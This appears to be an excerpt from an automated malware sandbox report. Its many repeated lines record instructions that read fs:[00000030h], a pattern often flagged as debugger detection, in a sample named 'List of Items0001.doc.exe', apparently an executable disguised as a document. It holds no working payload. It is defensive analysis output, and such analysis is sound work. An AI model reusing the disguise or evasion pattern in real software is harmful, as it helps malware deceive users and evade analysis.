        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326702F9 mov eax, dword ptr fs:[00000030h]3_2_326702F9
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326702F9 mov eax, dword ptr fs:[00000030h]3_2_326702F9
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326702F9 mov eax, dword ptr fs:[00000030h]3_2_326702F9
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326702F9 mov eax, dword ptr fs:[00000030h]3_2_326702F9
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326702F9 mov eax, dword ptr fs:[00000030h]3_2_326702F9
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326702F9 mov eax, dword ptr fs:[00000030h]3_2_326702F9
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326702F9 mov eax, dword ptr fs:[00000030h]3_2_326702F9
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326702F9 mov eax, dword ptr fs:[00000030h]3_2_326702F9
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326832C5 mov eax, dword ptr fs:[00000030h]3_2_326832C5
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_327332C9 mov eax, dword ptr fs:[00000030h]3_2_327332C9
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326842AF mov eax, dword ptr fs:[00000030h]3_2_326842AF
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326842AF mov eax, dword ptr fs:[00000030h]3_2_326842AF
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326592AF mov eax, dword ptr fs:[00000030h]3_2_326592AF
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3273B2BC mov eax, dword ptr fs:[00000030h]3_2_3273B2BC
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3273B2BC mov eax, dword ptr fs:[00000030h]3_2_3273B2BC
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3273B2BC mov eax, dword ptr fs:[00000030h]3_2_3273B2BC
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3273B2BC mov eax, dword ptr fs:[00000030h]3_2_3273B2BC
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265C2B0 mov ecx, dword ptr fs:[00000030h]3_2_3265C2B0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3271F2AE mov eax, dword ptr fs:[00000030h]3_2_3271F2AE
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326DE289 mov eax, dword ptr fs:[00000030h]3_2_326DE289
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3266B360 mov eax, dword ptr fs:[00000030h]3_2_3266B360
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3266B360 mov eax, dword ptr fs:[00000030h]3_2_3266B360
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3266B360 mov eax, dword ptr fs:[00000030h]3_2_3266B360
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3266B360 mov eax, dword ptr fs:[00000030h]3_2_3266B360
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3266B360 mov eax, dword ptr fs:[00000030h]3_2_3266B360
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3266B360 mov eax, dword ptr fs:[00000030h]3_2_3266B360
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3269E363 mov eax, dword ptr fs:[00000030h]3_2_3269E363
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3269E363 mov eax, dword ptr fs:[00000030h]3_2_3269E363
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3269E363 mov eax, dword ptr fs:[00000030h]3_2_3269E363
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3269E363 mov eax, dword ptr fs:[00000030h]3_2_3269E363
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3269E363 mov eax, dword ptr fs:[00000030h]3_2_3269E363
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3269E363 mov eax, dword ptr fs:[00000030h]3_2_3269E363
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3269E363 mov eax, dword ptr fs:[00000030h]3_2_3269E363
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3269E363 mov eax, dword ptr fs:[00000030h]3_2_3269E363
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3268237A mov eax, dword ptr fs:[00000030h]3_2_3268237A
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326DE372 mov eax, dword ptr fs:[00000030h]3_2_326DE372
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326DE372 mov eax, dword ptr fs:[00000030h]3_2_326DE372
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326DE372 mov eax, dword ptr fs:[00000030h]3_2_326DE372
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326DE372 mov eax, dword ptr fs:[00000030h]3_2_326DE372
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326E0371 mov eax, dword ptr fs:[00000030h]3_2_326E0371
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326E0371 mov eax, dword ptr fs:[00000030h]3_2_326E0371
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32658347 mov eax, dword ptr fs:[00000030h]3_2_32658347
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32658347 mov eax, dword ptr fs:[00000030h]3_2_32658347
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32658347 mov eax, dword ptr fs:[00000030h]3_2_32658347
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3269A350 mov eax, dword ptr fs:[00000030h]3_2_3269A350
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3268332D mov eax, dword ptr fs:[00000030h]3_2_3268332D
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32733336 mov eax, dword ptr fs:[00000030h]3_2_32733336
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32698322 mov eax, dword ptr fs:[00000030h]3_2_32698322
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32698322 mov eax, dword ptr fs:[00000030h]3_2_32698322
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32698322 mov eax, dword ptr fs:[00000030h]3_2_32698322
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265E328 mov eax, dword ptr fs:[00000030h]3_2_3265E328
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265E328 mov eax, dword ptr fs:[00000030h]3_2_3265E328
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265E328 mov eax, dword ptr fs:[00000030h]3_2_3265E328
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326E330C mov eax, dword ptr fs:[00000030h]3_2_326E330C
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326E330C mov eax, dword ptr fs:[00000030h]3_2_326E330C
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326E330C mov eax, dword ptr fs:[00000030h]3_2_326E330C
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326E330C mov eax, dword ptr fs:[00000030h]3_2_326E330C
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32659303 mov eax, dword ptr fs:[00000030h]3_2_32659303
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32659303 mov eax, dword ptr fs:[00000030h]3_2_32659303
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3269631F mov eax, dword ptr fs:[00000030h]3_2_3269631F
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3267E310 mov eax, dword ptr fs:[00000030h]3_2_3267E310
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3267E310 mov eax, dword ptr fs:[00000030h]3_2_3267E310
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3267E310 mov eax, dword ptr fs:[00000030h]3_2_3267E310
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3271F30A mov eax, dword ptr fs:[00000030h]3_2_3271F30A
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265C3C7 mov eax, dword ptr fs:[00000030h]3_2_3265C3C7
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326663CB mov eax, dword ptr fs:[00000030h]3_2_326663CB
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326933D0 mov eax, dword ptr fs:[00000030h]3_2_326933D0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326943D0 mov ecx, dword ptr fs:[00000030h]3_2_326943D0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326E43D5 mov eax, dword ptr fs:[00000030h]3_2_326E43D5
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326693A6 mov eax, dword ptr fs:[00000030h]3_2_326693A6
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326693A6 mov eax, dword ptr fs:[00000030h]3_2_326693A6
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326DC3B0 mov eax, dword ptr fs:[00000030h]3_2_326DC3B0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32661380 mov eax, dword ptr fs:[00000030h]3_2_32661380
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32661380 mov eax, dword ptr fs:[00000030h]3_2_32661380
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32661380 mov eax, dword ptr fs:[00000030h]3_2_32661380
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32661380 mov eax, dword ptr fs:[00000030h]3_2_32661380
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32661380 mov eax, dword ptr fs:[00000030h]3_2_32661380
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3267F380 mov eax, dword ptr fs:[00000030h]3_2_3267F380
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3267F380 mov eax, dword ptr fs:[00000030h]3_2_3267F380
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3267F380 mov eax, dword ptr fs:[00000030h]3_2_3267F380
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3267F380 mov eax, dword ptr fs:[00000030h]3_2_3267F380
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3267F380 mov eax, dword ptr fs:[00000030h]3_2_3267F380
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3267F380 mov eax, dword ptr fs:[00000030h]3_2_3267F380
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3268A390 mov eax, dword ptr fs:[00000030h]3_2_3268A390
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3268A390 mov eax, dword ptr fs:[00000030h]3_2_3268A390
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3268A390 mov eax, dword ptr fs:[00000030h]3_2_3268A390
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3271F38A mov eax, dword ptr fs:[00000030h]3_2_3271F38A
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32666074 mov eax, dword ptr fs:[00000030h]3_2_32666074
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32666074 mov eax, dword ptr fs:[00000030h]3_2_32666074
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32667072 mov eax, dword ptr fs:[00000030h]3_2_32667072
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32690044 mov eax, dword ptr fs:[00000030h]3_2_32690044
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32661051 mov eax, dword ptr fs:[00000030h]3_2_32661051
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32661051 mov eax, dword ptr fs:[00000030h]3_2_32661051
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32685004 mov eax, dword ptr fs:[00000030h]3_2_32685004
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32685004 mov ecx, dword ptr fs:[00000030h]3_2_32685004
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32668009 mov eax, dword ptr fs:[00000030h]3_2_32668009
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326A2010 mov ecx, dword ptr fs:[00000030h]3_2_326A2010
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265C0F6 mov eax, dword ptr fs:[00000030h]3_2_3265C0F6
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3269D0F0 mov eax, dword ptr fs:[00000030h]3_2_3269D0F0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3269D0F0 mov ecx, dword ptr fs:[00000030h]3_2_3269D0F0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326590F8 mov eax, dword ptr fs:[00000030h]3_2_326590F8
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326590F8 mov eax, dword ptr fs:[00000030h]3_2_326590F8
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326590F8 mov eax, dword ptr fs:[00000030h]3_2_326590F8
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326590F8 mov eax, dword ptr fs:[00000030h]3_2_326590F8
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265B0D6 mov eax, dword ptr fs:[00000030h]3_2_3265B0D6
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265B0D6 mov eax, dword ptr fs:[00000030h]3_2_3265B0D6
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265B0D6 mov eax, dword ptr fs:[00000030h]3_2_3265B0D6
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265B0D6 mov eax, dword ptr fs:[00000030h]3_2_3265B0D6
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3267B0D0 mov eax, dword ptr fs:[00000030h]3_2_3267B0D0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_327350B7 mov eax, dword ptr fs:[00000030h]3_2_327350B7
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326A00A5 mov eax, dword ptr fs:[00000030h]3_2_326A00A5
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3270F0A5 mov eax, dword ptr fs:[00000030h]3_2_3270F0A5
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3270F0A5 mov eax, dword ptr fs:[00000030h]3_2_3270F0A5
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3270F0A5 mov eax, dword ptr fs:[00000030h]3_2_3270F0A5
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3270F0A5 mov eax, dword ptr fs:[00000030h]3_2_3270F0A5
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3270F0A5 mov eax, dword ptr fs:[00000030h]3_2_3270F0A5
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3270F0A5 mov eax, dword ptr fs:[00000030h]3_2_3270F0A5
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3270F0A5 mov eax, dword ptr fs:[00000030h]3_2_3270F0A5
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3271B0AF mov eax, dword ptr fs:[00000030h]3_2_3271B0AF
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32734080 mov eax, dword ptr fs:[00000030h]3_2_32734080
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32734080 mov eax, dword ptr fs:[00000030h]3_2_32734080
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32734080 mov eax, dword ptr fs:[00000030h]3_2_32734080
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32734080 mov eax, dword ptr fs:[00000030h]3_2_32734080
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32734080 mov eax, dword ptr fs:[00000030h]3_2_32734080
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32734080 mov eax, dword ptr fs:[00000030h]3_2_32734080
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32734080 mov eax, dword ptr fs:[00000030h]3_2_32734080
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265C090 mov eax, dword ptr fs:[00000030h]3_2_3265C090
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265A093 mov ecx, dword ptr fs:[00000030h]3_2_3265A093
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3269716D mov eax, dword ptr fs:[00000030h]3_2_3269716D
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326B717A mov eax, dword ptr fs:[00000030h]3_2_326B717A
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326B717A mov eax, dword ptr fs:[00000030h]3_2_326B717A
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32666179 mov eax, dword ptr fs:[00000030h]3_2_32666179
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265A147 mov eax, dword ptr fs:[00000030h]3_2_3265A147
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265A147 mov eax, dword ptr fs:[00000030h]3_2_3265A147
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265A147 mov eax, dword ptr fs:[00000030h]3_2_3265A147
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32733157 mov eax, dword ptr fs:[00000030h]3_2_32733157
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32733157 mov eax, dword ptr fs:[00000030h]3_2_32733157
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32733157 mov eax, dword ptr fs:[00000030h]3_2_32733157
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326F314A mov eax, dword ptr fs:[00000030h]3_2_326F314A
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326F314A mov eax, dword ptr fs:[00000030h]3_2_326F314A
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326F314A mov eax, dword ptr fs:[00000030h]3_2_326F314A
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326F314A mov eax, dword ptr fs:[00000030h]3_2_326F314A
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3269415F mov eax, dword ptr fs:[00000030h]3_2_3269415F
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32735149 mov eax, dword ptr fs:[00000030h]3_2_32735149
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32697128 mov eax, dword ptr fs:[00000030h]3_2_32697128
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32697128 mov eax, dword ptr fs:[00000030h]3_2_32697128
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3271F13E mov eax, dword ptr fs:[00000030h]3_2_3271F13E
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326EA130 mov eax, dword ptr fs:[00000030h]3_2_326EA130
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3268510F mov eax, dword ptr fs:[00000030h]3_2_3268510F
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3268510F mov eax, dword ptr fs:[00000030h]3_2_3268510F
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3268510F mov eax, dword ptr fs:[00000030h]3_2_3268510F
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3268510F mov eax, dword ptr fs:[00000030h]3_2_3268510F
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3268510F mov eax, dword ptr fs:[00000030h]3_2_3268510F
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3268510F mov eax, dword ptr fs:[00000030h]3_2_3268510F
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3268510F mov eax, dword ptr fs:[00000030h]3_2_3268510F
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3268510F mov eax, dword ptr fs:[00000030h]3_2_3268510F
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3268510F mov eax, dword ptr fs:[00000030h]3_2_3268510F
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3268510F mov eax, dword ptr fs:[00000030h]3_2_3268510F
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3268510F mov eax, dword ptr fs:[00000030h]3_2_3268510F
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3268510F mov eax, dword ptr fs:[00000030h]3_2_3268510F
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3268510F mov eax, dword ptr fs:[00000030h]3_2_3268510F
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3266510D mov eax, dword ptr fs:[00000030h]3_2_3266510D
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_32690118 mov eax, dword ptr fs:[00000030h]3_2_32690118
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265F113 mov eax, dword ptr fs:[00000030h]3_2_3265F113
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265F113 mov eax, dword ptr fs:[00000030h]3_2_3265F113
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265F113 mov eax, dword ptr fs:[00000030h]3_2_3265F113
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265F113 mov eax, dword ptr fs:[00000030h]3_2_3265F113
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265F113 mov eax, dword ptr fs:[00000030h]3_2_3265F113
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265F113 mov eax, dword ptr fs:[00000030h]3_2_3265F113
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265F113 mov eax, dword ptr fs:[00000030h]3_2_3265F113
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265F113 mov eax, dword ptr fs:[00000030h]3_2_3265F113
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265F113 mov eax, dword ptr fs:[00000030h]3_2_3265F113
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265F113 mov eax, dword ptr fs:[00000030h]3_2_3265F113
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265F113 mov eax, dword ptr fs:[00000030h]3_2_3265F113
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265F113 mov eax, dword ptr fs:[00000030h]3_2_3265F113
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265F113 mov eax, dword ptr fs:[00000030h]3_2_3265F113
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265F113 mov eax, dword ptr fs:[00000030h]3_2_3265F113
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265F113 mov eax, dword ptr fs:[00000030h]3_2_3265F113
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265F113 mov eax, dword ptr fs:[00000030h]3_2_3265F113
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265F113 mov eax, dword ptr fs:[00000030h]3_2_3265F113
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265F113 mov eax, dword ptr fs:[00000030h]3_2_3265F113
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265F113 mov eax, dword ptr fs:[00000030h]3_2_3265F113
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265F113 mov eax, dword ptr fs:[00000030h]3_2_3265F113
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3265F113 mov eax, dword ptr fs:[00000030h]3_2_3265F113
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326691E5 mov eax, dword ptr fs:[00000030h]3_2_326691E5
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326691E5 mov eax, dword ptr fs:[00000030h]3_2_326691E5
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3266A1E3 mov eax, dword ptr fs:[00000030h]3_2_3266A1E3
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3266A1E3 mov eax, dword ptr fs:[00000030h]3_2_3266A1E3
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3266A1E3 mov eax, dword ptr fs:[00000030h]3_2_3266A1E3
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3266A1E3 mov eax, dword ptr fs:[00000030h]3_2_3266A1E3
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3266A1E3 mov eax, dword ptr fs:[00000030h]3_2_3266A1E3
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3268B1E0 mov eax, dword ptr fs:[00000030h]3_2_3268B1E0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3268B1E0 mov eax, dword ptr fs:[00000030h]3_2_3268B1E0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3268B1E0 mov eax, dword ptr fs:[00000030h]3_2_3268B1E0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3268B1E0 mov eax, dword ptr fs:[00000030h]3_2_3268B1E0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3268B1E0 mov eax, dword ptr fs:[00000030h]3_2_3268B1E0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3268B1E0 mov eax, dword ptr fs:[00000030h]3_2_3268B1E0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3268B1E0 mov eax, dword ptr fs:[00000030h]3_2_3268B1E0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326581EB mov eax, dword ptr fs:[00000030h]3_2_326581EB
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326591F0 mov eax, dword ptr fs:[00000030h]3_2_326591F0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326591F0 mov eax, dword ptr fs:[00000030h]3_2_326591F0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326701F1 mov eax, dword ptr fs:[00000030h]3_2_326701F1
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326701F1 mov eax, dword ptr fs:[00000030h]3_2_326701F1
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326701F1 mov eax, dword ptr fs:[00000030h]3_2_326701F1
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3268F1F0 mov eax, dword ptr fs:[00000030h]3_2_3268F1F0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_3268F1F0 mov eax, dword ptr fs:[00000030h]3_2_3268F1F0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_327281EE mov eax, dword ptr fs:[00000030h]3_2_327281EE
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_327281EE mov eax, dword ptr fs:[00000030h]3_2_327281EE
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326701C0 mov eax, dword ptr fs:[00000030h]3_2_326701C0
        Source: C:\Users\user\Desktop\List of Items0001.doc.exeCode function: 3_2_326701C0 mov eax, dword ptr fs:[00000030h]3_2_326701C0
